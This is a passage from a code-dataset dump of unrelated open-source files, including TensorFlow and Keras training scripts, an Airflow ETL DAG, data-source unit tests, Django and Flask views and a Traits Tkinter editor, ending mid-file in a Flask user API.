sess.as_default():\n\n #创建CNN模型\n cnn = TextCNN(\n\t sequence_length = x_train.shape[1], #输入的序列长度\n\t num_classes = y_train.shape[1], #输出的类别数目\n\t embedding_size = FLAGS.embedding_dim,#隐藏层数目\n\t filter_sizes = list(map(int, FLAGS.filter_sizes.split(\",\"))),#过滤器的尺寸\n\t num_filters = FLAGS.num_filters, #过滤器的数目\n\t l2_reg_lambda = FLAGS.l2_reg_lambda) #L2正则化参数\n\n #定义训练过程\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)#训练次数\n optimizer = tf.train.AdamOptimizer(1e-3) #优化算法\n grads_and_vars = optimizer.compute_gradients(cnn.loss) #计算相关的梯度\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)#运用梯度(gradients)\n\n # 追踪梯度值和稀疏值\n grad_summaries = []\n for g, v in grads_and_vars:\n if g is not None:\n grad_hist_summary = tf.summary.histogram(\"{}/grad/hist\".format(v.name), g)\n sparsity_summary = tf.summary.scalar(\"{}/grad/sparsity\".format(v.name), tf.nn.zero_fraction(g))\n grad_summaries.append(grad_hist_summary)\n grad_summaries.append(sparsity_summary)\n grad_summaries_merged = tf.summary.merge(grad_summaries)\n\n #输出的路径\n print(\"Writing to {}\\n\".format(out_dir))\n\n #正确率与损失率\n loss_summary = tf.summary.scalar(\"loss\", cnn.loss)\n acc_summary = tf.summary.scalar(\"accuracy\", cnn.accuracy)\n\n #训练总结\n train_summary_op = tf.summary.merge([loss_summary, acc_summary, grad_summaries_merged])\n train_summary_dir = os.path.join(out_dir, \"summaries\", \"train\")\n train_summary_writer = tf.summary.FileWriter(train_summary_dir, sess.graph)\n\n #验证总结\n dev_summary_op = tf.summary.merge([loss_summary, acc_summary])\n dev_summary_dir = os.path.join(out_dir, \"summaries\", \"dev\")\n dev_summary_writer = tf.summary.FileWriter(dev_summary_dir, sess.graph)\n\n #存储检查点\n checkpoint_dir = os.path.abspath(os.path.join(out_dir, \"checkpoints\"))\n checkpoint_prefix = os.path.join(checkpoint_dir, \"model\")\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.num_checkpoints)\n\n #初始化所有变量\n sess.run(tf.global_variables_initializer())\n\n #训练的一个步骤\n def train_step(x_batch, y_batch):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n cnn.input_x: x_batch,\n cnn.input_y: y_batch,\n cnn.dropout_keep_prob: FLAGS.dropout_keep_prob\n }\n _, step, summaries, loss, accuracy = sess.run(\n [train_op, global_step, train_summary_op, cnn.loss, cnn.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n train_summary_writer.add_summary(summaries, step)\n\n #验证的一个步骤\n def dev_step(x_batch, y_batch, writer=None):\n \"\"\"\n Evaluates model on a dev set\n \"\"\"\n feed_dict = {\n cnn.input_x: x_batch,\n cnn.input_y: y_batch,\n cnn.dropout_keep_prob: 1.0\n }\n step, summaries, loss, accuracy = sess.run(\n [global_step, dev_summary_op, cnn.loss, cnn.accuracy],\n feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, step, loss, accuracy))\n if writer:\n writer.add_summary(summaries, step)\n\n #产生batch\n batches = data_process_tool.batch_iter(\n list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_steps)\n\n #循环训练\n for batch in batches:\n x_batch, y_batch = zip(*batch)\n train_step(x_batch, y_batch)\n current_step = tf.train.global_step(sess, global_step)\n if current_step % FLAGS.evaluate_every == 0:\n print(\"\\nEvaluation:\")\n dev_step(x_dev, y_dev, writer=dev_summary_writer)\n print(\"\")\n if current_step % FLAGS.checkpoint_every == 0:\n path = saver.save(sess, checkpoint_prefix, global_step=current_step)\n print(\"Saved model checkpoint to {}\\n\".format(path))","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280072641","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 28 20:09:19 2017\n\n@author: Adwait\n\"\"\"\n# given values\n# balance - the outstanding balance on the credit card\n\n# annualInterestRate - annual interest rate as a decimal\n\n# monthlyPaymentRate - minimum monthly payment rate as a decimal\n\ndef yearbalance(balance,annualInterestRate,monthlyPayment):\n itr=0\n while itr<12:\n balance=round((balance-monthlyPayment)*(1+annualInterestRate/12),2)\n itr+=1\n \n return balance\n \nmonthlyPayment=0 \nbalance=10000\nannualInterestRate=11.32 \nwhile yearbalance(balance, annualInterestRate, monthlyPayment)>0: \n monthlyPayment+=10\nprint('Lowest Payment: ', monthlyPayment)\n ","sub_path":"credit card bal initial.py","file_name":"credit card bal initial.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220973601","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TKAgg')\nimport matplotlib.pyplot as plt\n\n\n@np.vectorize\ndef plot(_, N):\n n = N + 1\n W = np.sqrt(1 / N) * np.random.randn(1, N)\n t = np.linspace(0, 1, n)\n B = np.insert(np.cumsum(W[0, :]), 0, 0)\n plt.plot(t, B, linewidth=0.2)\n\n\ndef constrain(N):\n fn = np.vectorize(lambda x: np.sqrt(x) * 3)\n n = N + 1\n t = np.linspace(0, 1, n)\n x = fn(t)\n plt.plot(t, x, 'k', linewidth=2)\n plt.plot(t, -1 * x, 'k', linewidth=2)\n\n\nN = 1000\nM = 500\n\nplot(range(M), N)\nconstrain(N)\n\nplt.grid(True)\nplt.show()\n","sub_path":"ex2.1.py","file_name":"ex2.1.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32860563","text":"from __future__ import unicode_literals\nfrom io import BytesIO, StringIO\nimport unittest\n\nfrom saucebrush.sources import (\n CSVSource, FixedWidthFileSource, HtmlTableSource, JSONSource)\n\nclass SourceTestCase(unittest.TestCase):\n\n def _get_csv(self):\n data = '''a,b,c\n1,2,3\n5,5,5\n1,10,100'''\n return StringIO(data)\n\n def test_csv_source_basic(self):\n source = CSVSource(self._get_csv())\n expected_data = [{'a':'1', 'b':'2', 'c':'3'},\n {'a':'5', 'b':'5', 'c':'5'},\n {'a':'1', 'b':'10', 'c':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_csv_source_fieldnames(self):\n source = CSVSource(self._get_csv(), ['x','y','z'])\n expected_data = [{'x':'a', 'y':'b', 'z':'c'},\n {'x':'1', 'y':'2', 'z':'3'},\n {'x':'5', 'y':'5', 'z':'5'},\n {'x':'1', 'y':'10', 'z':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_csv_source_skiprows(self):\n source = CSVSource(self._get_csv(), skiprows=1)\n expected_data = [{'a':'5', 'b':'5', 'c':'5'},\n {'a':'1', 'b':'10', 'c':'100'}]\n self.assertEqual(list(source), expected_data)\n\n def test_fixed_width_source(self):\n data = StringIO('JamesNovember 3 1986\\nTim September151999')\n fields = (('name',5), ('month',9), ('day',2), ('year',4))\n source = FixedWidthFileSource(data, fields)\n expected_data = [{'name':'James', 'month':'November', 'day':'3',\n 'year':'1986'},\n {'name':'Tim', 'month':'September', 'day':'15',\n 'year':'1999'}]\n self.assertEqual(list(source), expected_data)\n\n def test_json_source(self):\n\n content = StringIO(\"\"\"[{\"a\": 1, \"b\": \"2\", \"c\": 3}]\"\"\")\n\n js = JSONSource(content)\n self.assertEqual(list(js), [{'a': 1, 'b': '2', 'c': 3}])\n\n def test_html_table_source(self):\n\n content = StringIO(\"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n
abc
123
\n \n \"\"\")\n\n try:\n\n import lxml\n\n hts = HtmlTableSource(content, 'thetable')\n self.assertEqual(list(hts), [{'a': '1', 'b': '2', 'c': '3'}])\n\n except ImportError:\n # Python 2.6 doesn't have skipTest. We'll just suffer without it.\n if hasattr(self, 'skipTest'):\n self.skipTest(\"lxml is not installed\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"saucebrush/tests/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140170779","text":"\nfrom __future__ import print_function\n\nimport time\nfrom builtins import range\nfrom pprint import pprint\n\nfrom airflow.utils.dates import days_ago\n\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator, BranchPythonOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nimport pickle\nfrom airflow.hooks.base_hook import BaseHook\nfrom multiprocessing import Process, Lock, Pool, cpu_count\nimport cx_Oracle\nimport pandas as pd\nimport calendar\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\nimport os\nimport shutil\nimport sys\nsys.path.append(\"/root/Documents/Projects/CustomModules/\")\nfrom etlRunnerTemplate import *\n\nargs = {\n 'owner': 'EtlRunner',\n 'start_date': days_ago(2)\n}\n\ndag = DAG(\n dag_id='air_etl_airtime_transact',\n default_args=args,\n schedule_interval=\"@weekly\",\n tags=['airtime'],\n)\n\netl_args = {\n \"dest_table_name\" : \"air_etl_airtime_transact\",\n \"dest_table_columns_definition\" : {\n \"BRA_CODE\":(\"Number(4)\", int), \n \"CUS_NUM\":(\"Number(7)\", int), \n \"SELF_AIRTIME_COUNT\":(\"Number\", int), \n \"SELF_AIRTIME_VALUE\":(\"Number\", float), \n \"TOTAL_AIRTIME_COUNT\":(\"Number\", int), \n \"TOTAL_AIRTIME_VALUE\":(\"Number\", float)}, # highlights destination table fields excluding reference_dates and control_dates; simply agg_columns and agg_measures\n \"source_query\" : \"\"\"select tra_date,a.bra_code,a.cus_num,tra_amt,crnt_bal,lpad(substr(remarks,-10),11,0) receiver_mob_num,\n b.cus_mobile sender_cus_mobile,b.cus_telephone sender_cus_telephone\n from stg.src_transact a, stg.src_customer_extd@exadata_new b\n where a.bra_code=b.bra_code and a.cus_num=b.cus_num\n and a.expl_code=32 and can_rea_code=0 and a.cus_num>99999 and deb_cre_ind=1\"\"\",\n \"etl_period\" : EtlPeriod.MONTHLY,\n \"etl_period_freq\" : 12,\n \"source_control_date_field_name\" : \"TRA_DATE\",\n \"agg_columns\" : [\"BRA_CODE\",\"CUS_NUM\"], # optional\n \"agg_measures\" : [\n (\"COUNT(CASE WHEN RECEIVER_MOB_NUM=SENDER_CUS_MOBILE OR RECEIVER_MOB_NUM=SENDER_CUS_TELEPHONE THEN 1 END)\",\"SELF_AIRTIME_COUNT\"),\n (\"NVL(SUM(CASE WHEN RECEIVER_MOB_NUM=SENDER_CUS_MOBILE OR RECEIVER_MOB_NUM=SENDER_CUS_TELEPHONE THEN TRA_AMT END),0)\", \"SELF_AIRTIME_VALUE\"),\n (\"COUNT(1)\", \"TOTAL_AIRTIME_COUNT\"),\n (\"NVL(SUM(TRA_AMT),0)\", \"TOTAL_AIRTIME_VALUE\")],\n \"optimize_extraction\":True,\n \"dest_reference_date_field_name\" : None, #optional\n \"dest_control_date_field_name\" : None, #optional\n \"etl_end_date\" : None, #optional\n \"staging_directory\":None, #optional\n}\n\ndagWrapper = ETLDagWrapper(dag, etl_args)\n\ndagWrapper.task_does_destination_table_exists >> [dagWrapper.task_create_destination_table, dagWrapper.task_filter_sourcing_sql_dates] >> dagWrapper.task_dress_sourcing_sql_queries\ndagWrapper.task_dress_sourcing_sql_queries >> dagWrapper.task_does_staging_directory_exists\ndagWrapper.task_does_staging_directory_exists >> [dagWrapper.task_clear_staging_directory, dagWrapper.task_create_staging_directory] >> dagWrapper.task_extract_starts\nfor d_from, d_to in dagWrapper.etl_args[\"sourcing_sql_dates\"]:\n cur_operator = PythonOperator(\n task_id=f\"extract_{d_from}_{d_to}\",\n provide_context=True,\n python_callable=dagWrapper.extract,\n op_kwargs={\"d_from\":d_from, \"d_to\":d_to},\n dag=dag,\n # trigger_rule='none_failed_or_skipped'\n )\n dagWrapper.task_extract_starts >> cur_operator >> dagWrapper.task_extract_ends\ndagWrapper.task_extract_ends >> dagWrapper.task_load >> dagWrapper.task_unique_test\n\n","sub_path":"etl_airtime_recharges.py","file_name":"etl_airtime_recharges.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"556788366","text":"'''\nimdb排名前250名电影,迅雷下载链接保存到films.txt文件\n'''\nfrom bs4 import BeautifulSoup\nimport requests\n\nf = open('files/films.txt', 'a')\nurl = \"http://www.cnblogs.com/shangdawei/p/4306621.html\"\nhtml = requests.get(url)\nsoup = BeautifulSoup(html.text, 'html.parser')\nlinks = soup.select(\"div #cnblogs_post_body > p > a\")\nfor link in links:\n print(link.attrs[\"href\"])\n f.write(link.attrs[\"href\"]+'\\n')","sub_path":"imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202068720","text":"# Load Libraries\nimport numpy as np\nimport tensorflow as tf\nfrom keras.models import Model\nfrom keras import regularizers\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers import Input, LSTM, Embedding\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\n#from . import model_preproecess\nimport model_preproecess\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nwith tf.device(\"/GPU:0\"):\n\n def simple_lstm(max_len=74, emb_dim=32, max_vocab_len=100, lstm_output_size=32, W_reg=regularizers.l2(1e-4)):\n # Input\n main_input = Input(shape=(max_len,), dtype='int32', name='main_input')\n\n # Embedding layer\n emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim,\n input_length=max_len, dropout=0.2, W_regularizer=W_reg)(main_input)\n\n # LSTM layer\n lstm = LSTM(lstm_output_size)(emb)\n lstm = Dropout(0.5)(lstm)\n\n # Output layer (last fully connected layer)\n output = Dense(21, activation='sigmoid', name='output')(lstm)\n\n # Compile model and define optimizer\n model = Model(input=[main_input], output=[output])\n adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', preprocess.fmeasure, preprocess.recall, preprocess.precision])\n\n return model\n\nwith tf.device(\"/GPU:0\"):\n epochs = 10\n batch_size = 64\n\n preprocess = model_preproecess.Preprocessor()\n\n X_train, X_test, y_train, y_test = preprocess.load_data()\n\n model = simple_lstm()\n history = model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size)\n\n history_dict = history.history\n print(history_dict.keys())\n #epochs = range(1, len(history_dict['loss']) + 1)\n\n # \"bo\" is for \"blue dot\"\n #plt.plot(epochs, history_dict['fmeasure'], 'r',label='f1')\n #plt.plot(epochs, history_dict['precision'], 'g',label='precision')\n #plt.plot(epochs, history_dict['recall'], 'k',label='recall')\n\n #plt.xlabel('Epochs')\n #plt.grid()\n #plt.legend(loc=1)\n #plt.show()\n\n y_pred_class_prob = model.predict(X_test, batch_size=64)\n y_pred_class = np.argmax(y_pred_class_prob, axis=1)\n y_test_class = np.argmax(y_test, axis=1)\n y_val_class = y_test_class\n\n print (\"precision\" , metrics.precision_score(y_val_class, y_pred_class, average = 'weighted'))\n print (\"recall\" , metrics.recall_score(y_val_class, y_pred_class, average = 'weighted'))\n print (\"f1\" , metrics.f1_score(y_val_class, y_pred_class, average = 'weighted'))\n\n print(classification_report(y_val_class, y_pred_class, digits=4))\n\n # Save final training model\n # model_name = \"LSTM\"\n # preprocess.save_model(model, \"../models/\" + model_name + \".json\", \"../models/\" + model_name + \".h5\")\n","sub_path":"dke/cs/knu/models/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79729934","text":"# pre-processing.py\nfrom scipy.signal import butter, lfilter\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# D = 151\n# Intervel = 100\n\n\ndef load_collect(D, Intervel):\n data = []\n labels = []\n for label, name in enumerate(['downstair', 'still', 'upstair', 'walking', 'running']):\n with open('collect/'+name, 'rb') as f:\n d = pickle.load(f)\n\n d = filter_array(d, D, Intervel)\n data.append(d)\n labels.append(np.ones(d.shape[0]) * label)\n\n data = np.concatenate(data, axis=0)\n labels = np.concatenate(labels, axis=0)\n return data, labels\n\n\ndef filter_array(pp_data, D, Intervel):\n out = []\n for i in range(int(np.floor((pp_data.shape[0]-D) / float(Intervel)))):\n part = pp_data[Intervel * i: Intervel * i + D]\n fx, fy, fz = filtering(part[:, 0], part[:, 1], part[:, 2])\n # fx, fy, fz = part[:, 0], part[:, 1], part[:, 2]\n out.append(np.concatenate([fx, fy, fz], axis=0))\n return np.array(out)\n\n\ndef read(filename):\n with open(filename, 'r') as f:\n string = f.read()\n data = []\n index = 0\n while index < len(string) - 10:\n x_ind = string[index:].find('x')\n y_ind = string[index:].find('y')\n z_ind = string[index:].find('z')\n timestamp_ind = string[index:].find('timestamp')\n x = float(string[index + x_ind + 2: index + y_ind - 1])\n y = float(string[index + y_ind + 2: index + z_ind - 1])\n z = float(string[index + z_ind + 2: index + timestamp_ind - 1])\n next_x_ind = string[index + x_ind + 2:].find('x')\n if next_x_ind == -1:\n break\n # timestamp = float(string[index + timestamp_ind + 10: index + x_ind + next_x_ind - 2])\n data.append((10*x, 10*y, 10*z, None))\n index = index + x_ind + next_x_ind - 2\n return data\n#\n# def readmyown(filename):\n# with open(filename, 'r') as f:\n# lines = f.readlines()\n# data = []\n# for l in lines:\n# if l[0] != 'X':\n# continue\n# x_ind = l.find('X')\n# y_ind = l.find('Y')\n# z_ind = l.find('Z')\n# x = float(l[x_ind + 4 : y_ind - 1])\n# y = float(l[y_ind + 4 : z_ind - 2])\n# z = float(l[z_ind + 4 : ])\n# data.append((x, y, z, None))\n# return data\n\n\ndef filtering(fx, fy, fz):\n assert fx.ndim==1 and fy.ndim==1 and fz.ndim==1 , 'fx fy fz must be 1-d'\n fc = 0.3 # filter cutoff\n fs = 50 # frequency rate of the signal\n [but, att] = butter(6, fc / (fs / 2.)) # Butterworth filter creation\n gx = lfilter(but, att, fx)\n gy = lfilter(but, att, fy)\n gz = lfilter(but, att, fz)\n fx = fx - gx\n fy = fy - gy\n fz = fz - gz\n return fx, fy, fz\n\n\ndef plot_acc():\n mlp = [92.86, 92.98, 92.37, 94.60, 94.86, 95.11, 94.67, 92.64, 94.48, 89.66, 87.31, 74.90, 62.89, 53.65]\n lr = [62.86, 59.09, 57.25, 74.92, 78.00, 74.89, 75.05, 71.83, 70.98, 70.88, 65.40, 62.65, 62.47, 56.67]\n knn = [90.48, 92.15, 91.98, 94.57, 94.92, 96.00, 94.67, 96.83, 96.86, 96.64, 96.10, 93.88, 91.35, 80.91]\n dt = [76.19, 83.88, 81.30, 86.86, 87.94, 87.11, 87.24, 87.44, 88.96, 89.02, 90.33, 87.55, 86.18, 82.45]\n n_features = [150, 130, 120, 100, 90, 70, 60, 40, 30, 20, 10, 5, 3, 1]\n n_features_log = [np.log(a) for a in n_features]\n\n sns.set()\n plt.plot(n_features, mlp, 'r')\n plt.plot(n_features, lr, 'g')\n plt.plot(n_features, knn, 'b')\n plt.plot(n_features, dt, 'k')\n plt.legend(['MLP', 'LR', 'KNN', 'DT'], loc=4)\n plt.show(block=True)\n\n\nif __name__ == '__main__':\n plot_acc()\n exit(0)\n data = read('collect/running.txt')\n pp_data = np.array([[x, y, z] for x, y, z, _ in data])\n with open('collect/running', 'wb') as f:\n pickle.dump(pp_data, f)\n exit(0)","sub_path":"Recognition/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227996771","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import render\nfrom .models import Character, Fighter, Mage, Cleric, Thief\n\ndef index(request):\n return HttpResponse(\"Character Creator App!\")\n\n@login_required\ndef view_all_characters(request):\n characters = Character.objects.all()\n context = {'characters': characters}\n return render(request, 'characters/index.html', context)\n\n@login_required\ndef view_character(request, character_id):\n try:\n character = Character.objects.get(pk=character_id)\n context = {'character': character}\n return render(request, 'characters/detail.html', context)\n except Character.DoesNotExist:\n raise Http404(\"No Character matches the given query.\")\n\n@login_required\ndef view_all_items(request, character_id):\n character = Character.objects.get(pk=character_id) \n items = character.inventory.get_queryset()\n context = {'items': items}\n return render(request, 'characters/items.html', context)\n\n@login_required\ndef view_item(request, character_id, item_id):\n try:\n character = Character.objects.get(pk=character_id) \n item = character.inventory.get(pk=item_id)\n context = {'item': item}\n return render(request, 'characters/item_details.html', context)\n except Character.DoesNotExist:\n raise Http404(\"No Items matches the given query.\")","sub_path":"rpg/charactercreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544574699","text":"#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Define the Tkinter implementation of the various instance editors\n# and the instance editor factory.\n#\n# Symbols defined: ToolkitEditorFactory\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n\nimport tk\n\nfrom enthought.traits.api import HasTraits, Str, Undefined\nfrom enthought.traits.ui.view import kind_trait\nfrom editor_factory import EditorFactory\nfrom editor import Editor\nfrom constants import scrollbar_dx\n\n#-------------------------------------------------------------------------------\n# 'ToolkitEditorFactory' class:\n#-------------------------------------------------------------------------------\n\nclass ToolkitEditorFactory ( EditorFactory ):\n \n #---------------------------------------------------------------------------\n # Trait definitions:\n #---------------------------------------------------------------------------\n \n label = Str # Optional label for button\n view = Str # Optional name of the instance view to use\n kind = kind_trait # Kind of pop-up editor (live, modal, nonmodal, wizard)\n \n #---------------------------------------------------------------------------\n # 'Editor' factory methods:\n #---------------------------------------------------------------------------\n \n def simple_editor ( self, ui, object, name, description, parent ):\n return SimpleEditor( parent,\n factory = self, \n ui = ui, \n object = object, \n name = name, \n description = description ) \n \n def custom_editor ( self, ui, object, name, description, parent ):\n return CustomEditor( parent,\n factory = self, \n ui = ui, \n object = object, \n name = name, \n description = description ) \n \n#-------------------------------------------------------------------------------\n# 'SimpleEditor' class:\n#-------------------------------------------------------------------------------\n \nclass SimpleEditor ( Editor ):\n \n #---------------------------------------------------------------------------\n # Finishes initializing the editor by creating the underlying toolkit\n # widget:\n #---------------------------------------------------------------------------\n \n def init ( self, parent ):\n \"\"\" Finishes initializing the editor by creating the underlying toolkit\n widget.\n \"\"\"\n self.control = wx.Button( parent, -1, '' )\n wx.EVT_BUTTON( parent, self.control.GetId(), self.edit_instance )\n \n #---------------------------------------------------------------------------\n # Edit the contents of the object trait when the user clicks the button:\n #---------------------------------------------------------------------------\n \n def edit_instance ( self, event ):\n \"\"\" Edit the contents of the object trait when the user clicks the button.\n \"\"\"\n # Create the user interface:\n ui = self.value.edit_traits( self.factory.view, self.control, \n self.factory.kind )\n \n # Chain our undo history to the new user interface if it does not have\n # its own:\n if ui.history is Undefined:\n ui.history = self.ui.history\n \n #---------------------------------------------------------------------------\n # Updates the editor when the object trait changes external to the editor:\n #---------------------------------------------------------------------------\n \n def update_editor ( self ):\n \"\"\" Updates the editor when the object trait changes external to the \n editor.\n \"\"\"\n value = self.value\n if self.factory.label == '':\n label = 'None'\n if value is not None:\n label = value.__class__.__name__\n self.control.SetLabel( label )\n self.control.Enable( isinstance( value, HasTraits ) )\n \n#-------------------------------------------------------------------------------\n# 'CustomEditor' class:\n#-------------------------------------------------------------------------------\n \nclass CustomEditor ( Editor ):\n \n #---------------------------------------------------------------------------\n # Finishes initializing the editor by creating the underlying toolkit\n # widget:\n #---------------------------------------------------------------------------\n \n def init ( self, parent ):\n \"\"\" Finishes initializing the editor by creating the underlying toolkit\n widget.\n \"\"\"\n # Create a panel to hold the object trait's view:\n self.control = wx.ScrolledWindow( parent, -1 )\n self.control.SetAutoLayout( True )\n \n #---------------------------------------------------------------------------\n # Updates the editor when the object trait changes external to the editor:\n #---------------------------------------------------------------------------\n \n def update_editor ( self ):\n \"\"\" Updates the editor when the object trait changes external to the \n editor.\n \"\"\"\n panel = self.control\n panel.SetSizer( None )\n panel.DestroyChildren()\n sizer = wx.BoxSizer( wx.VERTICAL )\n value = self.value\n if not isinstance( value, HasTraits ):\n control = wx.StaticText( panel, -1, self.str_value )\n else:\n view = value.trait_view( self.factory.view )\n self._ui = ui = view.ui( value, panel, 'subpanel' )\n control = ui.control\n # Chain the sub-panel's undo history to ours:\n ui.history = self.ui.history\n sizer.Add( control, 0, wx.EXPAND )\n panel.SetAutoLayout( True )\n panel.SetSizer( sizer )\n panel.SetScrollRate( 16, 16 )\n width, height = control.GetSize()\n panel.SetSize( wx.Size( width + scrollbar_dx, height ) )\n panel.GetParent().Layout()\n\n","sub_path":"lib/enthought/traits/ui/tk/instance_editor.py","file_name":"instance_editor.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45030185","text":"# -*- coding: utf8 -*-\n\nfrom base.player import Player\nfrom interfaces import ControllerApi\nfrom widgets.notify import NotifyWidget\n\n\nclass FmMode(object):\n \"\"\"fm mode 一些说明\n\n 当切换到fm播放模式的时候,每向服务器请求一次,服务器会返回几首歌曲\n 所以当这几首歌曲播放结束的时候,我们要向服务器请求下几首歌\n \"\"\"\n _api = None\n _player = None\n _notify = None\n _songs = [] # brief music model\n\n @classmethod\n def load(cls):\n\n cls._notify = NotifyWidget()\n\n cls._api = ControllerApi.api\n cls._player = Player()\n cls._player.stop()\n\n cls.reset_song_list()\n\n @classmethod\n def reset_song_list(cls):\n cls._player.clear_playlist()\n if len(cls._songs) > 0:\n song = cls._songs.pop()\n mid = song['id']\n music_models = cls._api.get_song_detail(mid)\n if not ControllerApi.api.is_response_ok(music_models):\n cls.exit_fm()\n return\n cls._player.set_music_list([music_models[0]])\n else:\n cls._songs = cls._api.get_radio_songs()\n if not ControllerApi.api.is_response_ok(cls._songs):\n cls._player.stop()\n cls._notify.show_message(\"Error\", \"网络异常,请检查网络连接\")\n cls.exit_fm()\n else:\n cls.reset_song_list()\n\n @classmethod\n def load_fm(cls):\n \"\"\"播放FM\n\n 1. webkit加载FM播放页面,可以有点动画和设计\n 2. 由于播放FM,要时常向服务器请求歌曲,所以逻辑跟正常播放时有点不一样\n \"\"\"\n ControllerApi.state['fm'] = True\n ControllerApi.player.change_player_mode()\n ControllerApi.notify_widget.show_message(\"Info\", \"进入FM播放模式\")\n cls.load()\n ControllerApi.player.signal_playlist_finished.connect(FmMode.on_next_music_required)\n\n @classmethod\n def exit_fm(cls):\n \"\"\"如果从webview播放一首歌,就退出fm模式,暂时使用这个逻辑\n \"\"\"\n if ControllerApi.state['fm']:\n ControllerApi.player.change_player_mode()\n ControllerApi.notify_widget.show_message(\"O(∩_∩)O\", \"退出FM播放模式\")\n FmMode.exit()\n ControllerApi.state['fm'] = False\n\n @classmethod\n def on_next_music_required(cls):\n cls.reset_song_list()\n\n @classmethod\n def exit(cls):\n cls._player = None\n cls._api = None\n cls._notify = None\n","sub_path":"src/c/fm.py","file_name":"fm.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24535973","text":"from flask import Blueprint, request\nfrom donare.lib.api.helper import (api_response, valid_email, db_date_parse)\nfrom donare.core import app, db\nfrom donare.models import (User, Post, Message, Country, BloodType,\n Notification)\nfrom donare.lib.notifications import notify_message\nfrom flask_login import login_required, current_user\nfrom sqlalchemy.exc import IntegrityError\nimport datetime\n\nuserapi = Blueprint(__name__, 'donare.blueprints.users')\nCONTENT_TYPE_JSON = \"application/json\"\n\n\n@userapi.route('user/current', methods=['GET'])\n@login_required\ndef get_current_user():\n user = User.query.get(current_user.id)\n if not user:\n return api_response(True, \"invalid user\", 400)\n\n # TODO: add deleted_at validation\n\n return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/', methods=['GET'])\n@login_required\ndef get_user(user_id):\n user = User.query.get(user_id)\n if not user:\n return api_response(True, \"invalid user\", 400)\n\n # TODO: add deleted_at validation\n\n return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/', methods=['GET'])\n@login_required\ndef get_user_by_email(email):\n if not email:\n return api_response(True, \"Params not supplied\", 400)\n\n user = User.query.filter(User.email == email).order_by(\n User.id.desc()).first()\n\n # TODO: add deleted_at validation\n\n if not user:\n return api_response(True, \"user not found\", 404)\n\n return api_response(False, \"Success\", 200, user.to_serializable())\n\n\n@userapi.route('user/', methods=['GET'])\n@login_required\ndef get_user_by_phone(phone_number):\n\n if not phone_number:\n return api_response(True, \"Params not supplied\", 400)\n\n phone_number = '' if not phone_number else phone_number.strip()\n\n user = 